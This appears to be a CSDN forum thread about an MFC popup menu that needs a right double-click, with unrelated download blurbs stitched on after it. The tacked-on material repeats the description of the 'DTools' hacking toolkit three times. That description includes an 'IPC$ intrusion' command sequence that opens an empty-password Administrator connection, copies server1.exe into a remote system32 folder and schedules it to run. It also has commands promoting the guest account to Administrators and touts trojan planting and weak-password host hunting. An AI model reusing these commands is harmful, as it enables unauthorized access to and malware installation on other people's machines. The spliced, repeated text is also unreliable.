帮帮忙!为什么弹出菜单一定要双击才出现呢?

firemount 2000-07-28 02:04:00
我在一个CTreeView衍生的类里,通过菜单里Components and Controls...
加了一个Pop-up Menu,自动生成的代码我没做任何修改,
但程序运行时,一定要双击右键,菜单才会出现.
为什么呢?怎样才可以让单击右键就可以弹出菜单呢?

谢谢!

...全文
133 5 打赏 收藏 转发到动态 举报
写回复
用AI写文章
5 条回复
切换为时间正序
请发表友善的回复…
发表回复
firemount 2000-07-28
  • 打赏
  • 举报
回复
问题是,右键单击事件居然也要双击才响应,
我不知道是怎么回事,您可以试一下。

谢谢!

ps:
弹出式菜单的代码,自动生成的OnContextMenu函数里就有。
yusuco 2000-07-28
  • 打赏
  • 举报
回复
在OnContextMenu()函数中把菜单画出来,是一个比较现实的做法
zzh 2000-07-28
  • 打赏
  • 举报
回复
弹出式菜单用代码实现也不困难,如果需要源程序,可以给我来EMAIL:zzh1415@21cn.com.
只要重载WM_CONTEXMENU函数,然后响应右键点击事件就可以了。在OnContextMenu()函数中把菜单画出来。
firemount 2000-07-28
  • 打赏
  • 举报
回复
并没有WM_RBUTTONDBLCLK,添加Pop-up Menu后,
自动生成代码,使用的是ON_WM_CONTEXTMENU(),
我在其他的类(用CListView衍生)里试了,单击就可以的。

huntout 2000-07-28
  • 打赏
  • 举报
回复
將 WM_RBUTTONDBLCLK 消息映射改為 WM_RBUTTONUP
WinProc是一个在Windows下通用的进程管理工具,它除了具有一般进程管理工具的所有功能,还有一些自己的特色。下面是功能简介: 进程信息查看:可以查看进程的详细信息,包括线程数、模块数、占用内存、文件路径及进程相关的进程、线程详细信息等。 进程优先级设置:你可以主观上控制进程的CPU占用时间。 杀进程:WinProc提供多种杀进程方式。 1.在进程列表中直接双击可以结束选定进程; 2.在进程列表中右击选定进程,在弹出菜单中选择“结束该进程之后所有进程”可以用来对付令人讨厌的一直跑出来的IE窗口; 3.将一个或者多个进程加入待结束进程列表,可是对多个进程同时进行操作,比如全部结束或者定时结束; 4.另外右击系统通知区的WinProc小图标,在弹出菜单的杀进程子菜单中选择所要结束的进程,可以快速结束进程,全都是鼠标操作。 定时操作:在WinProc中可以定时结束进程或者定时关机。 保存进程列表:以文本方式保存当前系统运行的进程列表,以备查看,比较平庸的一个功能。 进程黑名单:顾名思义,将进程加入进程黑名单后,该进程将无法被启动。至于这样做的意义何在,就看什么人怎么用了,呵呵。 锁定屏幕:当你离开电脑的时候可以将屏幕锁定,没有你的密码将无法解锁,但是别人可以在你的屏幕上给你留言,用用就知道了。 热键激活WinProc:可以按热键(F12)激活或者隐藏WinProc,而且需要说明的是该热键穿透力很强,你甚至可以在一些屏蔽了热键的程序中激活WinProc。 热键杀进程:这个功能是为了应急而设计的。比如你在上班时间打游戏的时候,老板突然出现...如果你事先把一些比较敏感的程序(这里是游戏)加入待结束进程列表的话,不要急,只要按一下ScrLock,那尴尬的一幕将不复出现。 快速重启、注销、关机:如果你什么都喜欢快的话,这个功能或许能帮上忙。
DTools SQL是一款啊d网络工具包。 DTools SQL 啊d网络工具包 v2.02 修正版可以用用“IP端口”扫描可以用针对性的查看整个网段的某个打开的软口! 如冰河端口7626,win的共享端口139等 功能键说明: Ctrl+'1' ~ '9' 显示指定数字的页面 CtrL+'-' 前一页 CtrL+'+' 后一页 * 在IP1输入框里双击鼠标左键转到"主机查询" * 在IP2输入框里双击鼠标左键将把IP2输入框的IP转为IP1输入框的IP! * 在程序里,大部分地方都有右键功能! =================================== 文件组成 =================================== DTools.exe 主要的执行文件 Help.txt 帮助文件 Setup.ini 设置文件 IP.^_^ IP数据文件 *.d99 共享资源文件 *.Por 指定扫描的端口文件 1. Ping:判断某IP是否和网络连接的好帮手! 2. 共享资源查找:为你查找网上的共享资源! 3. 常用修改:反恶意网页修改,恢复系统设置等 4. Finger:Finger能为你查询对方系统的用户信息! 5. 端口扫描:使你更加了解对方主机端口的打开状况 6 NT消息发送:向NT的机子发送消息,便用Win介面使用更方便! 7. 路由查看:想知道某IP经过的路由?用本程序就可以给你答案! 8. 进程查看:查看正在运行的软件,查木马还是有一定的帮助的! 9. 本机IP:在上网的时候,想知道自己的IP吗?本程序可以为你办到! 10. IP端口扫描:有针对性的查看整个网段的某个端口,如冰河端口7626! 11. 网卡MAC:快速获取一个网段的 用户名、工作组、对方的网卡MAC地址 12.查错误代号说明 [不知道51这个代号表示什么错误,查一查就知道了! 13.网络状态查看:想知道自己机子打开了什么端口吗?本程序可帮上你的忙! 14.域名<=>IP:想知道域名对应的IP,想知道IP对应的域名,本程序可以帮助你! 15.远程服务查看:你可以查看和修改远程的服务,如关闭和启动Telnet,更方便! 16.主机查询:想知道IP的的所在地?想知道某地有哪些IP,本程序可帮上你的忙! 17.查看用户组信息:Win介面的查看远程机子的用户和组的信息,便用更方便! 18.开远程的:Telnet直截开启微软自带的Telnet,开Telnet,原来也可以这么简单! 19.肉鸡查找:查找一个网段NT,Win2000密码过于简单的主机,还加入了系统版本识别,使用更方便 20.查看隐藏共享:查看远程计算机的全部共享,包括隐藏的共享也可以查看的到,查看共享更方便! 一些常用的DOS网络命令 ================================================================== net share abc$=c:\ 将c:盘映射为 abc$ (加了“$”之后为隐藏的共享目录) net share c$ /del 禁止C$共享 net use z: \\*.*.*.*\C$ 把 *.*.*.*(IP) 的共享 C$ 映射为本地的 Z:盘 net use c: /del 删除映射的c盘 net use * /del /y 删除全部 net start 显示本地主机当前服务 net start telnet 启动 Telnet 服务 net start Server 启动 Server 服务 (IPC$ 和共享要靠这个服务) net stop Messenger 停止信使服务(不会在有烦人的Win的弹出广告了)! net stop server 停止Server 服务 (关了这服务,远程的机子就不能查看你的共享和用IPC$入侵) net user 得到本地主机的用户列表 net user guest /active:yes 将停用的guest帐号激活(变为可用) net user guest 888888 把 Guest 帐号的密码改为 888888 net localgroup Administrators guest /add 把 Guest 加到Administrators组中(这样你就有了超级权限了) net view \\*.*.*.* 查看指定IP主机上的共享 nbtstat -A *.*.*.* 得到远程主机的NetBIOS用户名列表 net share 查看本地主机的共享资源(本地的默认共享也可以看到) net use \\*.*.*.*\ipc$ "" /user:"" 建立空连接 telnet *.*.*.* 90 连接对方机子的telnet,端口为90 ipconfig 查看本机的IP信息 入侵ipc过程序命令 ----------------------------------------------- net use \\*.*.*.*\ipc$ "" /user:"Administrator" 建立用户名为 Administrator 密码为空的连接 copy server1.exe \\*.*.*.*\Admin$\system32 即将当前目录下的Server1.exe复制到对方Admin$共享的System32目录内 net time \\*.*.*.* 查看远程主机的当前时间 at \\*.*.*.* 14:00 server1.exe 在对方机子添加一个在 14:00 运行 server1.exe 的任务 netstat [-r] [-s] [-n] [-a] 参数含义: -r 显示本机路由表的内容; -s 显示每个协议的使用状态(包括TCP协议、UDP协议、IP协议); -n 以数字表格形式显示地址和端口; -a 显示所有主机的端口号。 DTools啊D网络工具包 更新说明; * 强加了远程查看和修改服务功能。 * 强加了查看隐藏共享。 * 强加了查看用户和组信息。 * 强加了NT消息发送。 * 强加了远程开Telnet的功能。 * 强加了查错误代号说明。 * 价面作了修改。 * 修正了在IP1里不能用快捷建 "Ctrl+C" "Ctrl+V" 等问题! 使复制和粘贴更方便! * 软件介面大小可以自由调整!使用更方便! * "肉鸡查找"增加了识别对方系统版本功能!使"肉对查找"有更体贴的感受! * "木马种植"可以只在对方系统添加命令,而不复制文件!就像远程Telnet这么好用! * 修正了"主机查询"的读取某些追捕数据文件会出错的问题! * "网络状态"的右键菜单加入了"查看所有端口所明",想知道你的机子打开端口的说明,一按就全知道! * "路由查看"增加了"显示域名"和"显示对方IP所在地"的功能,了解路由机子的信息更方便! * "共享资源查找"增加了"自动保存"! 当下提示:在主机框里输入IP将会在全部的IP框中加入刚输入的地址!在IP框中输入IP也会把IP加入主机框中!这样才会减少了复制、粘贴的工作量!
《Vue和SpringBoot打造假日旅社管理系统》课程,将讲解如何使用Vue和SpringBoot开发这个项目,手把手演示开发流程!附赠源码、文档、数据库脚本等全部资料,提供售后答疑。 课程简介本课程讲解的是《基于 Vue 和 SpringBoot 的假日旅社管理系统》,该系统支持民宿档案、民宿新闻、民宿预定、民宿评论这四大核心业务,适用于乡村民宿企业的民宿预定业务。系统给每个民宿档案提供一个唯一标识,对民宿预定、评论等各个环节进行快速批量的数据采集,确保游客及时掌握景区民宿的真实数据,方便游客进行民宿预定。另外系统还包括员工管理、组织机构管理、文件管理、权限管理功能,给旅社企业提供更个性化的民宿管理模式。假日旅社管理系统采用了基于角色的访问控制,角色和菜单关联,一个角色可以配置多个菜单权限;然后再将用户和角色关联,一位用户可以赋予多个角色。这样用户就可以根据角色拿到该有的菜单权限,更方便旅社企业的管理人员进行权限管控。   软件技术选型前端Vue:Vue 是构建前端界面的核心框架,本系统采用 2.6.14 版本。View UI:基于 Vue.js2.0 的组件库,本系统采用 4.7.0 版本。后端Spring Boot:构建系统核心逻辑的后端框架,本系统采用 2.7.0 版本。MyBatis / MyBatis Plus:后端连接数据库的框架,本系统采用 3.5.2 版本。数据库MySQL:本项目的主数据库,本系统采用 8.0.29 版本。Redis:本系统采用基于 Windows 版本的 Redis,用于图形验证码和用户菜单权限的临时存储,采用了 5.0.14 版本。开发环境VsCode:项目前端的开发工具,使用版本为 1.68.0。IntelliJ IDEA :项目后端的开发工具,使用版本为 2021.3.2。Jdk:Java 的开发环境,使用版本为 17.0.3.1。Maven:后端项目的打包工具,使用版本为 3.6.2。NodeJs:前端项目的开发环境,使用版本为 16.13.0。 软件架构分析基于 Vue 和 SpringBoot 的假日旅社管理系统包括了系统基础模块、民宿档案模块、民宿新闻模块、民宿预定模块、民宿评论模块这五大功能模块,其架构如下图所示。  接下来,分别对五大模块进行详细介绍。系统基础模块系统基础模块,是用于支撑假日旅社管理系统的正常运行,这个模块包括了登陆注册模块、员工部门管理、菜单权限管理等。假日旅社管理系统支持用户使用账号、密码和图形验证码登陆,操作界面如下图所示。  假日旅社管理系统支持用户使用手机号、姓名、密码和图形验证码注册,操作界面如下图所示。 用户成功进入系统后,可进入到基于 Vue 和 SpringBoot 的假日旅社管理系统的首页,首页展示了当前登陆的地址、现在的时间和用户配置的常用模块,如下图所示。 接着用户点击左侧的用户管理,即可进入用户管理模块,用户管理模块的首页如下图所示。 用户可以在这个模块对系统登陆用户的档案进行维护,包括添加新用户、删除用户、编辑用户、根据姓名/部门查询用户。用户可以进入部门管理模块,管理旅社的部门数据,如下图所示。 同理用户可以进入到菜单管理模块,对系统的菜单进行管理,菜单管理模块的操作界面如下图所示。 民宿档案模块第二个模块是民宿档案模块,民宿档案就是用来管理民宿的数据,民宿档案包括民宿的名称、面积、房号、房间类型、早餐情况、价格、备注等,以下是民宿档案模块的主界面。用户可以点击顶部的“新增”按钮,进入民宿档案添加界面,添加民宿档案数据,如下图所示。 其中房间类型为下拉框单项选择,如下图所示。还有早餐情况也是下拉单选,如下图所示。 用户可以对现有的民宿档案数据进行编辑更新,只需点击每一行民宿档案数据的“编辑”按钮,即可进入民宿档案数据的编辑界面,如下图所示。 用户也可以对不需要的民宿数据进行删除操作,用户点击删除时,系统会弹出二次确认弹框,如下图所示。  民宿新闻模块第三个模块是民宿新闻模块,民宿新闻就是用来管理民宿的新闻资讯,包含的功能如下所示。 民宿新闻包括民宿的名称、面积、房号、房间类型、早餐情况、价格、备注等,以下是民宿新闻模块的主界面,其中的图片仅供测试样例使用。用户可以点击顶部的“新增”按钮,进入民宿新闻添加界面,添加民宿新闻数据,如下图所示。 新闻描述字段采用了 ueditor 富文本编辑器,这是由百度 web 前端研发部开发的所见即所得的开源富文本编辑器,具有轻量、可定制、用户体验优秀等特点,基于 MIT 开源协议,所有源代码可自由修改和使用。 用户可以对现有的民宿新闻数据进行编辑更新,只需点击每一行民宿新闻数据的“编辑”按钮,即可进入民宿新闻数据的编辑界面,如下图所示。 民宿预定模块第四个模块是民宿预定模块,旅客可以在民宿预定模块中预定民宿,达到旅客的住宿目的,民宿预定模块包含的功能如下所示。民宿预定包括了预定民宿 ID、预定民宿名称、预定日期、下单时间、下单人 ID、下单人姓名、价格、是否付款、下单备注等字段,旅客首先进入民宿档案模块,可以看到每一行民宿数据都有一个预约按钮,如下图所示。 如用户点击 1 幢 102 民宿的预约按钮后,会弹出预约确认框,需要输入预约的日期,日期表单默认选择今日,如下图所示。 旅客需要点击“确认预约”按钮,完成预约操作,系统给与“预约成功”提示,如下图所示。 预约成功后,旅客可以从民宿预定模块中进行查询,如下图所示。 最后旅客进行付款操作,点击每一行右侧的付款按钮,如下图所示。支付完成后,系统将预定单的支付状态改为付款,预定流程结束,如下图所示。 民宿评论模块 第五个模块是民宿预定模块,旅客可以在民宿预定结束后评论民宿,以帮助更多的人了解民宿,民宿评论模块包含的功能如下所示。 民宿评论包括了民宿名称、民宿 ID、评论时间、评论内容、评论人 ID、评论人姓名等字段,旅客首先进入民宿档案模块,可以看到每一行民宿数据都有一个评论按钮,如下图所示。 旅客点击评论后,系统给与弹框反馈,如下图所示。  用户输入评论内容后,点击确认评论按钮,即可完成评论操作,如下图所示。  旅客评论后,即可在民宿评论模块中查看此评论数据,如下图所示。 也可以在民宿模块中,双击民宿数据查看评论信息,如下图所示。 项目总结本软件是基于 Vue 和 SpringBoot 的假日旅社管理系统,包含了民宿档案、民宿新闻、民宿预定、民宿评论这四个功能模块。 开发本系统的目的,就是为了帮助旅游景点的民宿企业提高民宿管理效率,降低人力成本,让旅游景点的民宿企业获得更多的经济效益。
DTools SQL是一款啊d网络工具包。 DTools SQL 啊d网络工具包 v2.02 修正版可以用用“IP端口”扫描可以用针对性的查看整个网段的某个打开的软口! 如冰河端口7626,win的共享端口139等 功能键说明: Ctrl+'1' ~ '9' 显示指定数字的页面 CtrL+'-' 前一页 CtrL+'+' 后一页 * 在IP1输入框里双击鼠标左键转到"主机查询" * 在IP2输入框里双击鼠标左键将把IP2输入框的IP转为IP1输入框的IP! * 在程序里,大部分地方都有右键功能! =================================== 文件组成 =================================== DTools.exe 主要的执行文件 Help.txt 帮助文件 Setup.ini 设置文件 IP.^_^ IP数据文件 *.d99 共享资源文件 *.Por 指定扫描的端口文件 1. Ping:判断某IP是否和网络连接的好帮手! 2. 共享资源查找:为你查找网上的共享资源! 3. 常用修改:反恶意网页修改,恢复系统设置等 4. Finger:Finger能为你查询对方系统的用户信息! 5. 端口扫描:使你更加了解对方主机端口的打开状况 6 NT消息发送:向NT的机子发送消息,便用Win介面使用更方便! 7. 路由查看:想知道某IP经过的路由?用本程序就可以给你答案! 8. 进程查看:查看正在运行的软件,查木马还是有一定的帮助的! 9. 本机IP:在上网的时候,想知道自己的IP吗?本程序可以为你办到! 10. IP端口扫描:有针对性的查看整个网段的某个端口,如冰河端口7626! 11. 网卡MAC:快速获取一个网段的 用户名、工作组、对方的网卡MAC地址 12.查错误代号说明 [不知道51这个代号表示什么错误,查一查就知道了! 13.网络状态查看:想知道自己机子打开了什么端口吗?本程序可帮上你的忙! 14.域名<=>IP:想知道域名对应的IP,想知道IP对应的域名,本程序可以帮助你! 15.远程服务查看:你可以查看和修改远程的服务,如关闭和启动Telnet,更方便! 16.主机查询:想知道IP的的所在地?想知道某地有哪些IP,本程序可帮上你的忙! 17.查看用户组信息:Win介面的查看远程机子的用户和组的信息,便用更方便! 18.开远程的:Telnet直截开启微软自带的Telnet,开Telnet,原来也可以这么简单! 19.肉鸡查找:查找一个网段NT,Win2000密码过于简单的主机,还加入了系统版本识别,使用更方便 20.查看隐藏共享:查看远程计算机的全部共享,包括隐藏的共享也可以查看的到,查看共享更方便! 一些常用的DOS网络命令 ================================================================== net share abc$=c:\ 将c:盘映射为 abc$ (加了“$”之后为隐藏的共享目录) net share c$ /del 禁止C$共享 net use z: \\*.*.*.*\C$ 把 *.*.*.*(IP) 的共享 C$ 映射为本地的 Z:盘 net use c: /del 删除映射的c盘 net use * /del /y 删除全部 net start 显示本地主机当前服务 net start telnet 启动 Telnet 服务 net start Server 启动 Server 服务 (IPC$ 和共享要靠这个服务) net stop Messenger 停止信使服务(不会在有烦人的Win的弹出广告了)! net stop server 停止Server 服务 (关了这服务,远程的机子就不能查看你的共享和用IPC$入侵) net user 得到本地主机的用户列表 net user guest /active:yes 将停用的guest帐号激活(变为可用) net user guest 888888 把 Guest 帐号的密码改为 888888 net localgroup Administrators guest /add 把 Guest 加到Administrators组中(这样你就有了超级权限了) net view \\*.*.*.* 查看指定IP主机上的共享 nbtstat -A *.*.*.* 得到远程主机的NetBIOS用户名列表 net share 查看本地主机的共享资源(本地的默认共享也可以看到) net use \\*.*.*.*\ipc$ "" /user:"" 建立空连接 telnet *.*.*.* 90 连接对方机子的telnet,端口为90 ipconfig 查看本机的IP信息 入侵ipc过程序命令 ----------------------------------------------- net use \\*.*.*.*\ipc$ "" /user:"Administrator" 建立用户名为 Administrator 密码为空的连接 copy server1.exe \\*.*.*.*\Admin$\system32 即将当前目录下的Server1.exe复制到对方Admin$共享的System32目录内 net time \\*.*.*.* 查看远程主机的当前时间 at \\*.*.*.* 14:00 server1.exe 在对方机子添加一个在 14:00 运行 server1.exe 的任务 netstat [-r] [-s] [-n] [-a] 参数含义: -r 显示本机路由表的内容; -s 显示每个协议的使用状态(包括TCP协议、UDP协议、IP协议); -n 以数字表格形式显示地址和端口; -a 显示所有主机的端口号。 DTools啊D网络工具包 更新说明; * 强加了远程查看和修改服务功能。 * 强加了查看隐藏共享。 * 强加了查看用户和组信息。 * 强加了NT消息发送。 * 强加了远程开Telnet的功能。 * 强加了查错误代号说明。 * 价面作了修改。 * 修正了在IP1里不能用快捷建 "Ctrl+C" "Ctrl+V" 等问题! 使复制和粘贴更方便! * 软件介面大小可以自由调整!使用更方便! * "肉鸡查找"增加了识别对方系统版本功能!使"肉对查找"有更体贴的感受! * "木马种植"可以只在对方系统添加命令,而不复制文件!就像远程Telnet这么好用! * 修正了"主机查询"的读取某些追捕数据文件会出错的问题! * "网络状态"的右键菜单加入了"查看所有端口所明",想知道你的机子打开端口的说明,一按就全知道! * "路由查看"增加了"显示域名"和"显示对方IP所在地"的功能,了解路由机子的信息更方便! * "共享资源查找"增加了"自动保存"! 当下提示:在主机框里输入IP将会在全部的IP框中加入刚输入的地址!在IP框中输入IP也会把IP加入主机框中!这样才会减少了复制、粘贴的工作量!
啊d网络工具包是可以用用“IP端口”扫描可以用针对性的查看整个网段的某个打开的软口!如冰河端口7626,win的共享端口139等 功能键说明: Ctrl+'1' ~ '9' 显示指定数字的页面 CtrL+'-' 前一页 CtrL+'+' 后一页 * 在IP1输入框里双击鼠标左键转到"主机查询" * 在IP2输入框里双击鼠标左键将把IP2输入框的IP转为IP1输入框的IP! * 在程序里,大部分地方都有右键功能! =================================== 文件组成 =================================== DTools.exe 主要的执行文件 Help.txt 帮助文件 Setup.ini 设置文件 IP.^_^ IP数据文件 *.d99 共享资源文件 *.Por 指定扫描的端口文件 1. Ping:判断某IP是否和网络连接的好帮手! 2. 共享资源查找:为你查找网上的共享资源! 3. 常用修改:反恶意网页修改,恢复系统设置等 4. Finger:Finger能为你查询对方系统的用户信息! 5. 端口扫描:使你更加了解对方主机端口的打开状况 6 NT消息发送:向NT的机子发送消息,便用Win介面使用更方便! 7. 路由查看:想知道某IP经过的路由?用本程序就可以给你答案! 8. 进程查看:查看正在运行的软件,查木马还是有一定的帮助的! 9. 本机IP:在上网的时候,想知道自己的IP吗?本程序可以为你办到! 10. IP端口扫描:有针对性的查看整个网段的某个端口,如冰河端口7626! 11. 网卡MAC:快速获取一个网段的 用户名、工作组、对方的网卡MAC地址 12.查错误代号说明 [不知道51这个代号表示什么错误,查一查就知道了! 13.网络状态查看:想知道自己机子打开了什么端口吗?本程序可帮上你的忙! 14.域名<=>IP:想知道域名对应的IP,想知道IP对应的域名,本程序可以帮助你! 15.远程服务查看:你可以查看和修改远程的服务,如关闭和启动Telnet,更方便! 16.主机查询:想知道IP的的所在地?想知道某地有哪些IP,本程序可帮上你的忙! 17.查看用户组信息:Win介面的查看远程机子的用户和组的信息,便用更方便! 18.开远程的:Telnet直截开启微软自带的Telnet,开Telnet,原来也可以这么简单! 19.肉鸡查找:查找一个网段NT,Win2000密码过于简单的主机,还加入了系统版本识别,使用更方便 20.查看隐藏共享:查看远程计算机的全部共享,包括隐藏的共享也可以查看的到,查看共享更方便! 一些常用的DOS网络命令 ================================================================== net share abc$=c:\ 将c:盘映射为 abc$ (加了“$”之后为隐藏的共享目录) net share c$ /del 禁止C$共享 net use z: \\*.*.*.*\C$ 把 *.*.*.*(IP) 的共享 C$ 映射为本地的 Z:盘 net use c: /del 删除映射的c盘 net use * /del /y 删除全部 net start 显示本地主机当前服务 net start telnet 启动 Telnet 服务 net start Server 启动 Server 服务 (IPC$ 和共享要靠这个服务) net stop Messenger 停止信使服务(不会在有烦人的Win的弹出广告了)! net stop server 停止Server 服务 (关了这服务,远程的机子就不能查看你的共享和用IPC$入侵) net user 得到本地主机的用户列表 net user guest /active:yes 将停用的guest帐号激活(变为可用) net user guest 888888 把 Guest 帐号的密码改为 888888 net localgroup Administrators guest /add 把 Guest 加到Administrators组中(这样你就有了超级权限了) net view \\*.*.*.* 查看指定IP主机上的共享 nbtstat -A *.*.*.* 得到远程主机的NetBIOS用户名列表 net share 查看本地主机的共享资源(本地的默认共享也可以看到) net use \\*.*.*.*\ipc$ "" /user:"" 建立空连接 telnet *.*.*.* 90 连接对方机子的telnet,端口为90 ipconfig 查看本机的IP信息 入侵ipc过程序命令 ----------------------------------------------- net use \\*.*.*.*\ipc$ "" /user:"Administrator" 建立用户名为 Administrator 密码为空的连接 copy server1.exe \\*.*.*.*\Admin$\system32 即将当前目录下的Server1.exe复制到对方Admin$共享的System32目录内 net time \\*.*.*.* 查看远程主机的当前时间 at \\*.*.*.* 14:00 server1.exe 在对方机子添加一个在 14:00 运行 server1.exe 的任务 netstat [-r] [-s] [-n] [-a] 参数含义: -r 显示本机路由表的内容; -s 显示每个协议的使用状态(包括TCP协议、UDP协议、IP协议); -n 以数字表格形式显示地址和端口; -a 显示所有主机的端口号。 DTools啊D网络工具包 更新说明; * 强加了远程查看和修改服务功能。 * 强加了查看隐藏共享。 * 强加了查看用户和组信息。 * 强加了NT消息发送。 * 强加了远程开Telnet的功能。 * 强加了查错误代号说明。 * 价面作了修改。 * 修正了在IP1里不能用快捷建 "Ctrl+C" "Ctrl+V" 等问题! 使复制和粘贴更方便! * 软件介面大小可以自由调整!使用更方便! * "肉鸡查找"增加了识别对方系统版本功能!使"肉对查找"有更体贴的感受! * "木马种植"可以只在对方系统添加命令,而不复制文件!就像远程Telnet这么好用! * 修正了"主机查询"的读取某些追捕数据文件会出错的问题! * "网络状态"的右键菜单加入了"查看所有端口所明",想知道你的机子打开端口的说明,一按就全知道! * "路由查看"增加了"显示域名"和"显示对方IP所在地"的功能,了解路由机子的信息更方便! * "共享资源查找"增加了"自动保存"!

16,471

社区成员

发帖
与我相关
我的任务
社区描述
VC/MFC相关问题讨论
社区管理员
  • 基础类社区
  • Web++
  • encoderlee
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告

        VC/MFC社区版块或许是CSDN最“古老”的版块了,记忆之中,与CSDN的年龄几乎差不多。随着时间的推移,MFC技术渐渐的偏离了开发主流,若干年之后的今天,当我们面对着微软的这个经典之笔,内心充满着敬意,那些曾经的记忆,可以说代表着二十年前曾经的辉煌……
        向经典致敬,或许是老一代程序员内心里面难以释怀的感受。互联网大行其道的今天,我们期待着MFC技术能够恢复其曾经的辉煌,或许这个期待会永远成为一种“梦想”,或许一切皆有可能……
        我们希望这个版块可以很好的适配Web时代,期待更好的互联网技术能够使得MFC技术框架得以重现活力,……

试试用AI创作助手写篇文章吧